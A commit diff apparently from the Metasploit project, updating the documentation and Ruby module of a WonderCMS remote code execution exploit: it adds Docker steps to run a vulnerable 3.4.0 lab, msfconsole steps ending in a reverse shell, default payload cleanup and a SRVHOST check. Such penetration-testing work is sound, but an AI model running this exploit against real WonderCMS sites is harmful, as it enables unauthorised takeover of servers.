Responding to comments

msutovsky-r7 · msutovsky-r7 · commit f2e0fe79be76 · 2025-04-30T17:53:26.000+02:00
diff --git a/documentation/modules/exploit/multi/http/wondercms_rce.md b/documentation/modules/exploit/multi/http/wondercms_rce.md
@@ -2,9 +2,15 @@
 
 [WonderCMS](https://www.wondercms.com/) is a free and open-source Content Management System (CMS). The main advantage is that only one PHP file controls the whole management. Follow next steps to install application:
 
+### Source Installation
 1. Install Apache2 and PHP on server
 2. Download WonderCMS from [here](https://github.com/WonderCMS/wondercms/releases/download/3.4.2/wondercms-342.zip)
 3. Enable Apache2 Rewrite Engine: `sudo a2enmod rewrite`
+### Docker Installation
+1. Clone the following repo: `git clone https://github.com/mablanco/docker-wondercms.git`
+2. Inside the `Dockerfile` set the version to a vulnerable version: `ARG WONDERCMS_VERSION=3.4.0`
+3. Build the image: ` docker build -t 3.4.0 .`
+4. Run the container: `docker run -d -p 8980:80 --name wondercms 3.4.0`
 
 
 ## Verification Steps
@@ -13,10 +19,12 @@
 2. Start msfconsole
 3. Do: `use multi/http/wondercms_rce`
 4. Do: `set PASSWORD [password]`
-5. Do: `set LHOST [attacker IP]`
-6. Do: `set LPORT [attacker PORT]`
-4. Do: `run`
-5. You should get a shell.
+5. Do: `set RHOST [WonderCMS IP]
+6. Do: `set SRVHOST [attacker IP to host payload]`
+7. Do: `set LHOST [attacker IP]`
+8. Do: `set LPORT [attacker PORT]`
+9. Do: `run`
+10. You should get a shell.
 
 ## Options
 
diff --git a/modules/exploits/multi/http/wondercms_rce.rb b/modules/exploits/multi/http/wondercms_rce.rb
@@ -58,7 +58,7 @@ def initialize(info = {})
     register_options([
       OptString.new('TARGETURI', [true, 'Path to the WonderCMS application', '/wondercms']),
       OptString.new('PASSWORD', [true, 'Password to log into WonderCMS', '']),
-      OptBool.new('CLEANUP', [false, 'Enable payload file cleanup', false])
+      OptBool.new('CLEANUP', [false, 'Enable payload file cleanup', true])
     ])
   end
 
@@ -148,6 +148,9 @@ def install_malicious_component
   end
 
   def exploit
+    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
+      fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')
+    end
     login
 
     create_vulnerable_zip
